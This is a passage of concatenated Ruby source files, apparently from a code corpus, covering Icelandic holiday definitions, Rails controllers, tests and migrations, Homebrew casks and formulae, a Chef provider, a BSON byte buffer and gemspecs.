# encoding: utf-8 module Holidays # This file is generated by the Ruby Holidays gem. # # Definitions loaded: data/is.yaml # # To use the definitions in this file, load it right after you load the # Holiday gem: # # require 'holidays' # require 'holidays/is' # # All the definitions are available at https://github.com/alexdunae/holidays module IS # :nodoc: def self.defined_regions [:is] end def self.holidays_by_month { 5 => [{:mday => 1, :name => "Verkalýðsdagurinn", :regions => [:is]}, {:mday => 13, :name => "Mæðradagurinn", :regions => [:is]}], 0 => [{:function => lambda { |year| Holidays.easter(year)-48 }, :function_id => "easter(year)-48", :name => "Bolludagur", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year)-47 }, :function_id => "easter(year)-47", :name => "Sprengidagur", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year)-46 }, :function_id => "easter(year)-46", :name => "Öskudagur", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year)-7 }, :function_id => "easter(year)-7", :name => "Pálmasunnudagur", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year)-3 }, :function_id => "easter(year)-3", :name => "Skírdagur", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year)-2 }, :function_id => "easter(year)-2", :name => "Föstudaginn langi", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year) }, :function_id => "easter(year)", :name => "Páskadagur", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year)+1 }, :function_id => "easter(year)+1", :name => "Annar í páskum", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year)+39 }, :function_id => "easter(year)+39", :name => "Uppstigningardagur", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year)+49 }, :function_id => "easter(year)+49", :name => "Hvítasunnudagur", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year)+50 }, :function_id => "easter(year)+50", :name => "Annar í hvítasunnu", :regions => [:is]}], 11 => [{:mday => 16, :name => "Dagur íslenskrar tungu", :regions => [:is]}], 6 => [{:mday => 3, :type => :informal, :name => "Sjómannadagurinn", :regions => [:is]}, {:mday => 17, :name => "Lýðveldisdagurinn", :regions => [:is]}], 1 => [{:mday => 1, :name => "Nýársdagur", :regions => [:is]}, {:mday => 6, :name => "Þrettándinn", :regions => [:is]}, {:mday => 19, :type => :informal, :name => "Bóndadagur", :regions => [:is]}], 12 => [{:mday => 24, :name => "Jól", :regions => [:is]}, {:mday => 25, :name => "Jól", :regions => [:is]}, {:mday => 26, :name => "Jól", :regions => [:is]}, {:mday => 31, :name => "Gamlárskvöld", :regions => [:is]}], 2 => [{:mday => 18, :type => :informal, :name => "Konudagur", :regions => [:is]}], 8 => [{:wday => 1, :week => 1, :name => "Frídagur verslunarmanna", :regions => [:is]}], 4 => [{:function => lambda { |year| Holidays.is_sumardagurinn_fyrsti(year) }, :function_id => "is_sumardagurinn_fyrsti(year)", :name => "Sumardagurinn fyrsti", :regions => [:is]}] } end end # Iceland: first day of summer (Thursday after 18 April) def self.is_sumardagurinn_fyrsti(year) date = Date.civil(year,4,18) if date.wday < 4 date += (4 - date.wday) else date date += (11 - date.wday) end date end end Holidays.merge_defs(Holidays::IS.defined_regions, Holidays::IS.holidays_by_month)
55.776119
185
0.560075
e8db002d0b9e9225052996c910afa5e843967b43
1,169
require 'test_helper'

class UsersControllerTest < ActionDispatch::IntegrationTest

  def setup
    @user = users(:michael)
    @other_user = users(:archer)
  end

  test "should redirect index when not logged in" do
    get users_path
    assert_redirected_to login_url
  end

  test "should get new" do
    get signup_path
    assert_response :success
  end

  test "should redirect edit when not logged in" do
    get edit_user_path(@user)
    assert_not flash.empty?
    assert_redirected_to login_url
  end

  test "should redirect update when not logged in" do
    patch user_path(@user), params: { user: { name: @user.name,
                                              email: @user.email } }
    assert_not flash.empty?
    assert_redirected_to login_url
  end

  test "should redirect destroy when not logged in" do
    assert_no_difference 'User.count' do
      delete user_path(@user)
    end
    assert_redirected_to login_url
  end

  test "should redirect destroy when logged in as a non-admin" do
    log_in_as(@other_user)
    assert_no_difference 'User.count' do
      delete user_path(@user)
    end
    assert_redirected_to root_url
  end
end
24.87234
68
0.686912
bbb1bd3bc029973641505a698266323067a9254e
2,534
# Project 60. # plan.io 10270 # bundle exec rake export:death fname='AIDS_ANNUAL_2016_TEST.txt' original_filename="deaths/SUBSET MBIS_Deaths_Subset_2016_skip1.txt" klass=Export::AidsDeathsAnnual project_name='Annual ONS Deaths for HIV Surveillance' team_name='HIV and STI Department' module Export class AidsDeathsAnnual < DeathFile SURVEILLANCE_CODES = { 'aids99' => / ^(A\d{2}|B\d{2}|C\d{2}|D[0-8][0-9]|E[0-8][0-9]|(F0[1-9]|F[1-9][0-9])| G\d{2}|H|I\d{4}|J\d{2}|(K0[0-8][0-9]|K9[0-5])|L\d{2}|M\d{2}|N\d{2}| O0[0-9]|O9A|(P0[0-8][0-9]|P9[0-6])|Q\d{2}|R\d{2}|S\d{2}| (T0[0-7][0-9]|T8[0-8])|V\d{2}|W\d{2}|X\d{2}|Y\d{2}|Z\d{2}) /x }.freeze def initialize(filename, e_type, ppats, filter = 'aids99') super @icd_fields_f = (1..20).collect { |i| ["icdf_#{i}", "icdpvf_#{i}"] }.flatten + %w(icduf) @icd_fields = (1..20).collect { |i| ["icd_#{i}", "icdpv_#{i}"] }.flatten + %w(icdu) end # kL/MS From looking at previous code we believe the following project node names equate to: # icd9sc_icd10sc => icdsc icdscf # icd9uf_icd10uf => icdu icduf # kL/MS From looking at previous code we believe the following project node names equate to: # fnamdx => fnamdx_1 fnamdx_2 # codt => codt_codfft which transforms to codfft in death_file.rb def fields %w[addrdt fnamd1 fnamd2 fnamd3 fnamdx_1 fnamdx_2 certifer] + %w[icdsc icdscf icdu icduf] + %w[podt dod dob sex ctrypob occdt pobt corcertt dor] + (1..6).collect { |i| "codt_codfft_#{i}" } + (1..4).collect { |i| "occfft_#{i}" } + %w[snamd] + (1..5).collect { |i| "aksnamd_#{i}" } end private def csv_options { col_sep: '|', row_sep: "\r\n" } end def match_row?(ppat, _surveillance_code = nil) return false unless ppat.death_data.dor >= '20010101' pattern = SURVEILLANCE_CODES[@filter] icd_fields = @icd_fields_f # Check only final codes, if any present, otherwise provisional codes icd_fields = @icd_fields if icd_fields.none? { |field| ppat.death_data.send(field).present? } return false if icd_fields.none? { |field| ppat.death_data.send(field) =~ pattern } true end def extract_row(ppat, _j) return unless match_row?(ppat) ppat.unlock_demographics('', '', '', :export) fields.collect { |field| extract_field(ppat, field) } end end end
43.689655
253
0.59708
39b16ab37451bfe3165364edbf9f2d3f6a1d406b
3,062
module Cms::Lib::Layout def self.current_concept concept = defined?(Page.current_item.concept) ? Page.current_item.concept : nil concept ||= Page.current_node.inherited_concept end def self.inhertited_concepts return [] unless current_concept current_concept.ancestors.reverse end def self.inhertited_layout layout = defined?(Page.current_item.layout) ? Page.current_item.layout : nil layout ||= Page.current_node.inherited_layout end def self.concepts_order(concepts, options = {}) return 'concept_id' if concepts.blank? table = options.has_key?(:table_name) ? options[:table_name] + '.' : '' order = "CASE #{table}concept_id" concepts.each_with_index {|c, i| order += " WHEN #{c.id} THEN #{i}"} order += " ELSE 100 END, #{table}id" end def self.find_design_pieces(html, concepts, params) names = html.scan(/\[\[piece\/([^\]]+)\]\]/).map{|n| n[0] }.uniq return {} if names.blank? relations = names.map do |name| rel = Cms::Piece.where(state: 'public') name_array = name.split('#') rel = if name_array.size > 1 # [[piece/name#id]] rel.where(id: name_array[1], name: name_array[0]) else # [[piece/name]] concept_ids = concepts.map(&:id) concept_ids << nil rel.where(name: name_array[0]) .where(concept_id: concept_ids) end rel.select("*, #{Cms::DataFile.connection.quote(name)}::text as name_with_option") .order(concepts_order(concepts)).limit(1) end pieces = Cms::Piece.union(relations).index_by(&:name_with_option) if Core.mode == 'preview' && params[:piece_id] item = Cms::Piece.find_by(id: params[:piece_id]) pieces[item.name] = item if item end pieces end def self.find_data_texts(html, concepts) names = html.scan(/\[\[text\/([0-9a-zA-Z\._-]+)\]\]/).flatten.uniq return {} if names.blank? relations = names.map do |name| Cms::DataText.public_state.where(name: name, concept_id: [nil] + concepts.to_a) .order(concepts_order(concepts)).limit(1) end Cms::DataText.union(relations).index_by(&:name) end def self.find_data_files(html, concepts) names = html.scan(/\[\[file\/([^\]]+)\]\]/).flatten.uniq return {} if names.blank? relations = names.map do |name| dirname = ::File.dirname(name) basename = dirname == '.' ? name : ::File.basename(name) item = Cms::DataFile.select(Cms::DataFile.arel_table[Arel.star]) .select("#{Cms::DataFile.connection.quote(name)} as name_with_option") .public_state.where(name: basename, concept_id: [nil] + concepts.to_a) if dirname == '.' item = item.where(node_id: nil) else item = item.joins(:node).where(Cms::DataFileNode.arel_table[:name].eq(dirname)) end item.order(concepts_order(concepts, :table_name => Cms::DataFile.table_name)).limit(1) end Cms::DataFile.union(relations).index_by(&:name_with_option) end end
34.404494
92
0.630634
e9ce9d6c0b859114d6a88fa6e18120b0dfd7286e
877
cask 'omnigraffle' do
  if MacOS.version <= :snow_leopard
    version '5.4.4'
    sha256 '7bcc64093f46bd4808b1a4cb86cf90c0380a5c5ffffd55ce8f742712818558df'
    url "http://www.omnigroup.com/ftp1/pub/software/MacOSX/10.6/OmniGraffle-#{version}.dmg"
  elsif MacOS.version <= :mavericks
    version '6.0.5'
    sha256 'a2eff19909d1ba38a4f01b2beecbde2f31f4af43d30e06d2c6921ae8880f85bc'
    url "http://www.omnigroup.com/ftp1/pub/software/MacOSX/10.8/OmniGraffle-#{version}.dmg"
  else
    version '6.6.1'
    sha256 '7671d46ccd0b53a5917b0ccba5971fe1f1d7990b2d636f25c941b11b03c6e23c'
    url "http://www.omnigroup.com/ftp1/pub/software/MacOSX/10.10/OmniGraffle-#{version}.dmg"
  end

  name 'OmniGraffle'
  homepage 'https://www.omnigroup.com/omnigraffle/'
  license :commercial

  app 'OmniGraffle.app'

  zap delete: '~/Library/Application Support/The Omni Group/OmniGraffle'
end
36.541667
92
0.759407
01f041ca3b498cd3b61721359db998ec5368baa4
1,128
#
# Author:: Adam Jacob (<[email protected]>)
# Author:: AJ Christensen (<[email protected]>)
# Copyright:: Copyright 2009-2017, Chef Software Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

class Chef
  class Provider
    class RubyBlock < Chef::Provider
      provides :ruby_block

      def load_current_resource
        true
      end

      def action_run
        converge_by("execute the ruby block #{new_resource.name}") do
          new_resource.block.call
          logger.info("#{new_resource} called")
        end
      end

      alias :action_create :action_run
    end
  end
end
27.512195
74
0.698582
f89e933c457ad319da8307e594795c67edb87734
96
require File.dirname(__FILE__) + '/spec_helper'

describe Kafka do

  before(:each) do
  end

end
13.714286
47
0.729167
182c38fca958f04480b4184acdae4bba94d3df9b
196
class ChangeServiceToText < ActiveRecord::Migration[4.1]
  def change
    change_column :casino_proxy_tickets, :service, :text
    change_column :casino_service_tickets, :service, :text
  end
end
28
58
0.77551
33d0fd098999fa7ad40d10fb36cf59610699c2aa
274
class Todos < Cask
  version 'latest'
  sha256 :no_check

  url 'http://dbachrach.com/opensoft/downloads/apps/Todos.dmg'
  appcast 'http://www.dbachrach.com/opensoft/appcasts/Todos.xml'
  homepage 'http://dbachrach.com/opensoft/index.php?page=Todos'

  link 'Todos.app'
end
24.909091
64
0.740876
ff96270b2eee892da9119e7dcda9af3e98a5f207
1,154
# coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'rails_translation_manager/version'

Gem::Specification.new do |spec|
  spec.name          = "rails_translation_manager"
  spec.version       = RailsTranslationManager::VERSION
  spec.authors       = ["Edd Sowden"]
  spec.email         = ["[email protected]"]
  spec.summary       = %q{Tasks to manage translation files}
  spec.description   = ""
  spec.homepage      = ""
  spec.license       = "MIT"

  spec.files         = `git ls-files -z`.split("\x0")
  spec.executables   = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
  spec.test_files    = spec.files.grep(%r{^(test|spec|features)/})
  spec.require_paths = ["lib"]

  spec.add_dependency "activesupport"
  spec.add_dependency "csv", "~> 3.2"
  spec.add_dependency "i18n-tasks"
  spec.add_dependency "rails-i18n"

  spec.add_development_dependency "bundler"
  spec.add_development_dependency "rake", "~> 10.0"
  spec.add_development_dependency "minitest"
  spec.add_development_dependency "rspec"
  spec.add_development_dependency "byebug"
end
36.0625
74
0.690641
e92f9db9b73b4dccf52dec73cf9ebde164331cd2
968
require 'spec_helper'

describe "Subscription" do
  context "as a user" do
    before do
      reset_spree_preferences do |config|
        config.default_country_id = create(:country).id
      end
      create(:payment_method)
      create(:free_shipping_method)

      @product1 = create(:subscribable_product, name: 'Giant Steps', available_on: '2011-01-06 18:21:13:')
      @product2 = create(:product, name: 'Bella Donavan', available_on: '2011-01-06 18:21:13:')
      @user = create(:user, email: "[email protected]", password: "secret", password_confirmation: "secret")
    end

    context "after order completion with subscribable product" do
      before do
        add_to_cart("Giant Steps")
        complete_checkout_with_login("[email protected]", "secret")
      end

      it "should find a subscription area in the user account page" do
        visit spree.account_path
        page.should have_content "My subscriptions"
      end
    end
  end
end
31.225806
109
0.676653
4ac4676e740fce4fd41d77be7b3fe1882b50d837
840
# encoding: utf-8
require File.expand_path(File.dirname(__FILE__) + '/spec_helper')

describe "StringToPinyin" do

  before :each do
    @single_char = "名"
    @multiple_chars = "中华人民共和国"
    @nil_char = "a"
    @punctuated = "你好! 你是中国人吗? <- that was mandarin"
  end

  it "should return pinyin for a single character if found" do
    @single_char.to_pinyin.should == 'míng'
  end

  it "should return pinyin with spaces in between for multiple characters if found" do
    @multiple_chars.to_pinyin.should == 'zhōng huá rén mín gòng hé guó'
  end

  it "should return a character if its not found in the index" do
    @nil_char.to_pinyin.should == 'a'
  end

  it "should return 'non-simplified chinese characters' as they are" do
    @punctuated.to_pinyin.should == 'nĭ hăo ! nĭ shì zhōng guó rén ma ? <- that was mandarin'
  end

end
30
93
0.694048
794fe55c4b0e5061b1b162ab1c96bde349c491fc
73
# frozen_string_literal: true

module ActionAuth
  VERSION = "0.1.0"
end
12.166667
29
0.739726
bf4b0dc7497e886ae36a30d43421746a9f01dc4d
252
class AddFeatureIdToForemTopic < ActiveRecord::Migration
  def change
    add_column :forem_topics, :feature_id, :int
    add_column :forem_topics, :area_id, :int
    add_index :forem_topics, :feature_id
    add_index :forem_topics, :area_id
  end
end
28
56
0.757937
f78d2c2bee5ffcba77dfccfa8bfcc6bcf87790eb
3,132
# Encoding: utf-8 # # This is auto-generated code, changes will be overwritten. # # Copyright:: Copyright 2021, Google Inc. All Rights Reserved. # License:: Licensed under the Apache License, Version 2.0. # # Code generated by AdsCommon library 1.0.3 on 2021-05-07 00:48:53. require 'ads_common/savon_service' require 'ad_manager_api/v202105/ad_rule_service_registry' module AdManagerApi; module V202105; module AdRuleService class AdRuleService < AdsCommon::SavonService def initialize(config, endpoint) namespace = 'https://www.google.com/apis/ads/publisher/v202105' super(config, endpoint, namespace, :v202105) end def create_ad_rules(*args, &block) return execute_action('create_ad_rules', args, &block) end def create_ad_rules_to_xml(*args) return get_soap_xml('create_ad_rules', args) end def create_ad_spots(*args, &block) return execute_action('create_ad_spots', args, &block) end def create_ad_spots_to_xml(*args) return get_soap_xml('create_ad_spots', args) end def create_break_templates(*args, &block) return execute_action('create_break_templates', args, &block) end def create_break_templates_to_xml(*args) return get_soap_xml('create_break_templates', args) end def get_ad_rules_by_statement(*args, &block) return execute_action('get_ad_rules_by_statement', args, &block) end def get_ad_rules_by_statement_to_xml(*args) return get_soap_xml('get_ad_rules_by_statement', args) end def get_ad_spots_by_statement(*args, &block) return execute_action('get_ad_spots_by_statement', args, &block) end def get_ad_spots_by_statement_to_xml(*args) return get_soap_xml('get_ad_spots_by_statement', args) end def get_break_templates_by_statement(*args, &block) return execute_action('get_break_templates_by_statement', args, &block) end def get_break_templates_by_statement_to_xml(*args) return get_soap_xml('get_break_templates_by_statement', args) end def perform_ad_rule_action(*args, &block) return execute_action('perform_ad_rule_action', args, &block) end def perform_ad_rule_action_to_xml(*args) return get_soap_xml('perform_ad_rule_action', args) end def update_ad_rules(*args, &block) return execute_action('update_ad_rules', args, &block) end def update_ad_rules_to_xml(*args) return get_soap_xml('update_ad_rules', args) end def update_ad_spots(*args, &block) return execute_action('update_ad_spots', args, &block) end def update_ad_spots_to_xml(*args) return get_soap_xml('update_ad_spots', args) end def update_break_templates(*args, &block) return execute_action('update_break_templates', args, &block) end def update_break_templates_to_xml(*args) return get_soap_xml('update_break_templates', args) end private def get_service_registry() return AdRuleServiceRegistry end def get_module() return AdManagerApi::V202105::AdRuleService end end end; end; end
28.216216
77
0.726373
ab44b33bab9a2eb501841b58e11dbbacfc9d44d5
4,638
# A byte buffer. module BSON class ByteBuffer attr_reader :order, :max_size INT32_PACK = 'l<'.freeze INT64_PACK = 'q<'.freeze DOUBLE_PACK = 'E'.freeze def initialize(initial_data="", max_size=DEFAULT_MAX_BSON_SIZE) @str = case initial_data when String then if initial_data.respond_to?(:force_encoding) initial_data.force_encoding('binary') else initial_data end when BSON::ByteBuffer then initial_data.to_a.pack('C*') else initial_data.pack('C*') end @cursor = @str.length @max_size = max_size end def rewind @cursor = 0 end def position @cursor end def position=(val) @cursor = val end def clear @str = "" @str.force_encoding('binary') if @str.respond_to?(:force_encoding) rewind end def size @str.size end alias_method :length, :size # Appends a second ByteBuffer object, +buffer+, to the current buffer. def append!(buffer) @str << buffer.to_s self end # Prepends a second ByteBuffer object, +buffer+, to the current buffer. def prepend!(buffer) @str = buffer.to_s + @str self end def put(byte, offset=nil) @cursor = offset if offset if more? @str[@cursor] = chr(byte) else ensure_length(@cursor) @str << chr(byte) end @cursor += 1 end def put_binary(data, offset=nil) @cursor = offset if offset if defined?(BINARY_ENCODING) data = data.dup.force_encoding(BINARY_ENCODING) end if more? @str[@cursor, data.length] = data else ensure_length(@cursor) @str << data end @cursor += data.length end def put_array(array, offset=nil) @cursor = offset if offset if more? @str[@cursor, array.length] = array.pack("C*") else ensure_length(@cursor) @str << array.pack("C*") end @cursor += array.length end def put_num(i, offset, bytes) pack_type = bytes == 4 ? INT32_PACK : INT64_PACK @cursor = offset if offset if more? @str[@cursor, bytes] = [i].pack(pack_type) else ensure_length(@cursor) @str << [i].pack(pack_type) end @cursor += bytes end def put_int(i, offset=nil) put_num(i, offset, 4) end def put_long(i, offset=nil) put_num(i, offset, 8) end def put_double(d, offset=nil) a = [] [d].pack(DOUBLE_PACK).each_byte { |b| a << b } put_array(a, offset) end # If +size+ == nil, returns one byte. Else returns array of bytes of length # # +size+. if "x"[0].is_a?(Integer) def get(len=nil) one_byte = len.nil? len ||= 1 check_read_length(len) start = @cursor @cursor += len if one_byte @str[start] else @str[start, len].unpack("C*") end end else def get(len=nil) one_byte = len.nil? len ||= 1 check_read_length(len) start = @cursor @cursor += len if one_byte @str[start, 1].ord else @str[start, len].unpack("C*") end end end def get_int check_read_length(4) vals = @str[@cursor..@cursor+3] @cursor += 4 vals.unpack(INT32_PACK)[0] end def get_long check_read_length(8) vals = @str[@cursor..@cursor+7] @cursor += 8 vals.unpack(INT64_PACK)[0] end def get_double check_read_length(8) vals = @str[@cursor..@cursor+7] @cursor += 8 vals.unpack(DOUBLE_PACK)[0] end def more? @cursor < @str.size end def ==(other) other.respond_to?(:to_s) && @str == other.to_s end def to_a(format="C*") @str.unpack(format) end def unpack(format="C*") to_a(format) end def to_s @str end def dump @str.each_byte do |c, i| $stderr.puts "#{'%04d' % i}: #{'%02x' % c} #{'%03o' % c} #{'%s' % c.chr} #{'%3d' % c}" i += 1 end end private def ensure_length(length) if @str.size < length @str << NULL_BYTE * (length - @str.size) end end def chr(byte) if byte < 0 [byte].pack('c') else byte.chr end end def check_read_length(len) raise "attempt to read past end of buffer" if @cursor + len > @str.length end end end
20.522124
94
0.53191
21146edf9c8b0f02c740448e1a93c2c85b36e565
2,793
class Pulseaudio < Formula desc "Sound system for POSIX OSes" homepage "https://wiki.freedesktop.org/www/Software/PulseAudio/" url "https://www.freedesktop.org/software/pulseaudio/releases/pulseaudio-14.0.tar.xz" sha256 "a834775d9382b055504e5ee7625dc50768daac29329531deb6597bf05e06c261" # The regex here avoids x.99 releases, as they're pre-release versions. livecheck do url :stable regex(/href=["']?pulseaudio[._-]v?((?!\d+\.9\d+)\d+(?:\.\d+)+)\.t/i) end bottle do sha256 "36f025d67efa9bc8198e4810dfc58b584d28f7980d4a98a3c2310f84caf7b773" => :big_sur sha256 "b395d9b2f2c5a89971b5fa65abeb9c7a3469f4572a496b554eacbaaff09a6586" => :arm64_big_sur sha256 "fc7ff97eaf91b6bcfeeb391b6c885c2fd9c6d3843ab668d9e85a68d7bb55f92d" => :catalina sha256 "78718069edbad1c576f4abf5c6fa2e6945e08699b006863dc3e94e27990f044c" => :mojave end head do url "https://gitlab.freedesktop.org/pulseaudio/pulseaudio.git" depends_on "autoconf" => :build depends_on "automake" => :build depends_on "gettext" => :build depends_on "intltool" => :build end depends_on "pkg-config" => :build depends_on "json-c" depends_on "libsndfile" depends_on "libsoxr" depends_on "libtool" depends_on "[email protected]" depends_on "speexdsp" uses_from_macos "perl" => :build uses_from_macos "expat" uses_from_macos "m4" def install args = %W[ --disable-dependency-tracking --disable-silent-rules --prefix=#{prefix} --enable-coreaudio-output --disable-neon-opt --disable-nls --disable-x11 --with-mac-sysroot=#{MacOS.sdk_path} --with-mac-version-min=#{MacOS.version} ] if build.head? # autogen.sh runs bootstrap.sh then ./configure system "./autogen.sh", *args else system "./configure", *args end system "make", "install" end plist_options manual: "pulseaudio" def plist <<~EOS <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key> <string>#{plist_name}</string> <key>ProgramArguments</key> <array> <string>#{opt_bin}/pulseaudio</string> <string>--exit-idle-time=-1</string> <string>--verbose</string> </array> <key>RunAtLoad</key> <true/> <key>KeepAlive</key> <true/> <key>StandardErrorPath</key> <string>#{var}/log/#{name}.log</string> <key>StandardOutPath</key> <string>#{var}/log/#{name}.log</string> </dict> </plist> EOS end test do assert_match "module-sine", shell_output("#{bin}/pulseaudio --dump-modules") end end
29.09375
108
0.649839
28f06fc899e7a8a1564699456f7b1e86c80acdb9
819
class SessionsController < ApplicationController

  def new
  end

  def create
    @user = User.find_by(email: params[:session][:email].downcase)
    if @user && @user.authenticate(params[:session][:password])
      if @user.activated?
        # log user and redirect to show page
        log_in @user
        params[:session][:remember_me] == '1' ? remember(@user) : forget(@user)
        redirect_back_or @user
      else
        message = "Account not activated. "
        message += "Check your email for the activation link."
        flash[:warning] = message
        redirect_to root_url
      end
    else
      # create error message
      flash.now[:danger] = "Invalid email/password combination"
      render 'new'
    end
  end

  def destroy
    log_out if logged_in?
    redirect_to root_url
  end
end
26.419355
79
0.632479
0125cc11f1f7870ae7f463c6fb02dc7445350a1c
3,742
# encoding: utf-8 module RailsBestPractices module Prepares # Remember controllers and controller methods class ControllerPrepare < Core::Check include Core::Check::Classable include Core::Check::InheritedResourcesable include Core::Check::Accessable interesting_nodes :class, :var_ref, :vcall, :command, :def interesting_files CONTROLLER_FILES DEFAULT_ACTIONS = %w(index show new create edit update destroy) def initialize @controllers = Prepares.controllers @methods = Prepares.controller_methods @helpers = Prepares.helpers @inherited_resources = false end # check class node to remember the class name. # also check if the controller is inherit from InheritedResources::Base. add_callback :start_class do |node| @controllers << @klass if @inherited_resources @actions = DEFAULT_ACTIONS end end # remember the action names at the end of class node if the controller is a InheritedResources. add_callback :end_class do |node| if @inherited_resources && "ApplicationController" != current_class_name @actions.each do |action| @methods.add_method(current_class_name, action, {"file" => node.file, "line_number" => node.line_number}) end end end # check if there is a DSL call inherit_resources. add_callback :start_var_ref do |node| if @inherited_resources @actions = DEFAULT_ACTIONS end end # check if there is a DSL call inherit_resources. add_callback :start_vcall do |node| if @inherited_resources @actions = DEFAULT_ACTIONS end end # restrict actions for inherited_resources add_callback :start_command do |node| if "include" == node.message.to_s @helpers.add_module_descendant(node.arguments.all.first.to_s, current_class_name) elsif @inherited_resources && "actions" == node.message.to_s if "all" == node.arguments.all.first.to_s @actions = DEFAULT_ACTIONS option_argument = node.arguments.all[1] if option_argument && :bare_assoc_hash == option_argument.sexp_type && option_argument.hash_value("except") @actions -= option_argument.hash_value("except").to_object end else @actions = node.arguments.all.map(&:to_s) end end end # check def node to remember all methods. # # the remembered methods (@methods) are like # { # "PostsController" => { # "save" => {"file" => "app/controllers/posts_controller.rb", "line_number" => 10, "unused" => false}, # "find" => {"file" => "app/controllers/posts_controller.rb", "line_number" => 10, "unused" => false} # }, # "CommentsController" => { # "create" => {"file" => "app/controllers/comments_controller.rb", "line_number" => 10, "unused" => false}, # } # } add_callback :start_def do |node| method_name = node.method_name.to_s @methods.add_method(current_class_name, method_name, {"file" => node.file, "line_number" => node.line_number}, current_access_control) end # ask Reviews::RemoveUnusedMoethodsInHelperReview to check the controllers who include helpers. add_callback :after_check do descendants = @helpers.map(&:descendants).flatten if descendants.present? Reviews::RemoveUnusedMethodsInHelpersReview.interesting_files *descendants.map { |descendant| %r|#{descendant.underscore}| } end end end end end
38.183673
142
0.635222
ab2c262fea70755ceff41f251a995876439a5c54
1,408
# frozen_string_literal: true

class PremiumController < ApplicationController
  before_action :authenticate_user!, except: [:index]

  def create
    price_id = Stripe::Price.list(active: true, recurring: {interval: "month"}).first.id

    session = Stripe::Checkout::Session.create(
      success_url: "#{success_premium_index_url}?session_id={CHECKOUT_SESSION_ID}",
      cancel_url: cancel_premium_index_url,
      mode: "subscription",
      allow_promotion_codes: true,
      customer_email: current_user.email,
      automatic_tax: {enabled: true},
      metadata: {user_id: current_user.id},
      line_items: [{quantity: 1, price: price_id}]
    )

    redirect_to session.url, allow_other_host: true
  end

  def update
    session = Stripe::BillingPortal::Session.create(
      customer: current_user.stripe_customer_id,
      return_url: shots_url
    )

    redirect_to session.url, allow_other_host: true
  end

  def success
    session = Stripe::Checkout::Session.retrieve(params[:session_id])
    subscription = Stripe::Subscription.retrieve(session.subscription)

    current_user.update(
      stripe_customer_id: session.customer,
      premium_expires_at: Time.zone.at(subscription.current_period_end)
    )

    flash[:notice] = "Subscribing was successful"
    redirect_to shots_path
  end

  def cancel
    flash[:alert] = "Subscribing was cancelled."
    redirect_to shots_path
  end
end
31.288889
88
0.723722
bbf7d8a1b4721149a2385b006d72ad41b74f536f
118
class AddUserIdToReview < ActiveRecord::Migration
  def change
    add_column :reviews, :user_id, :integer
  end
end
19.666667
49
0.754237
ab9a36a3a566de39517c716ace1a36b29f20ccf6
1,637
# This file is part of Metasm, the Ruby assembly manipulation suite # Copyright (C) 2006-2009 Yoann GUILLOT # # Licence is LGPL, see LICENCE in the top-level directory require 'metasm/main' module Metasm class ARM < CPU class Reg class << self attr_accessor :s_to_i, :i_to_s end @i_to_s = %w[r0 r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 sp lr pc] @s_to_i = { 'wr' => 7, 'sb' => 9, 'sl' => 10, 'fp' => 11, 'ip' => 12, 'sp' => 13, 'lr' => 14, 'pc' => 15 } 15.times { |i| @s_to_i["r#{i}"] = i } 4.times { |i| @s_to_i["a#{i+1}"] = i } 8.times { |i| @s_to_i["v#{i+1}"] = i+4 } attr_accessor :i, :stype, :shift, :updated def initialize(i, stype=:lsl, shift=0) @i = i @stype = stype @shift = shift end def symbolic r = self.class.i_to_s[@i].to_sym if @stype == :lsl and @shift == 0 r else r # TODO shift/rotate/... end end end class Memref attr_accessor :base, :offset, :sign, :incr def initialize(base, offset, sign=:+, incr=nil) @base, @offset, @sign, @incr = base, offset, sign, incr end def symbolic(len=4, orig=nil) o = @offset o = o.symbolic if o.kind_of? Reg p = Expression[@base.symbolic, @sign, o].reduce Indirection[p, len, orig] end end class RegList attr_accessor :list, :usermoderegs def initialize(l=[]) @list = l end end def initialize(endianness = :little) super() @endianness = endianness @size = 32 end def init_opcode_list init_latest @opcode_list end end class ARM_THUMB < ARM end end
21.539474
110
0.571778
5d31c9310ccd3ce794761efc942c7063200b6cba
413
Nyauth.configure do |config|
  # In Ruby 2.3 and earlier, characters beyond the allowed key length were silently truncated,
  # but Ruby 2.4 and later raise an ArgumentError, so the secret is limited to 32 characters.
  encryption_secret = ENV['NYAUTH_ENCRYPTION_SECRET'] || 'rails6dd08eff1c2cf5aecb54cb1a97266817b58cc27f06be9e95918c06607d3950d623a4fd4c0c306d2216cdaf3f99871e21e0e975a5e64ef5cf286b68ed8d7379a4'
  config.encryption_secret = encryption_secret[0..31]
  config.use_cookie_auth = true
end
51.625
192
0.859564
fff271e64eaea4c4af4182391d23c99ca7a17f7f
847
# -*- encoding: utf-8 -*-
Gem::Specification.new do |s|
  s.name = "declarative_authorization"
  s.version = "1.0.0.pre"
  s.required_ruby_version = ">= 2.0.0"
  s.authors = ["Steffen Bartsch"]
  s.summary = "declarative_authorization is a Rails plugin for maintainable authorization based on readable authorization rules."
  s.email = "[email protected]"
  s.files = %w{CHANGELOG MIT-LICENSE README.rdoc Rakefile authorization_rules.dist.rb garlic_example.rb init.rb} + Dir["app/**/*.rb"] + Dir["app/**/*.erb"] + Dir["config/*"] + Dir["lib/*.rb"] + Dir["lib/**/*.rb"] + Dir["lib/tasks/*"] + Dir["test/*"]
  s.has_rdoc = true
